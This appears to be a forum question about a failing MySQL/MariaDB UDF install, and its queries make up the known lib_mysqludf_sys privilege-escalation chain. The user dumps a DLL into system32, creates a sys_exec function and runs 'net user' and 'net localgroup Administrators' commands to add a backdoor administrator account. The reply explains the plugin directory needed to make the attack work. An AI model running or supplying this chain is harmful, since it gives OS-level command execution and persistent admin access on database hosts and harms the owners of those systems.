# I am trying to install udf plugin in mysql but getting error

Tags: php, mysql, mariadb

I am trying to install udf plugin in mysql but getting error on this query

```
MariaDB [mysql]> CREATE FUNCTION sys_exec
   RETURNS integer SONAME 'lib_mysqludf_s ys_32.dll';
ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys_32.dll' (errno: 0, )
```

[image]

(From comment:)

```
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_‌​sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```

Comment: USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

these queries i m using

Answer (score 0):

UDFs are not loaded from C:\windows\system32, only from plugin directory . Use "SELECT @@plugin_dir" to check where it is in your installation.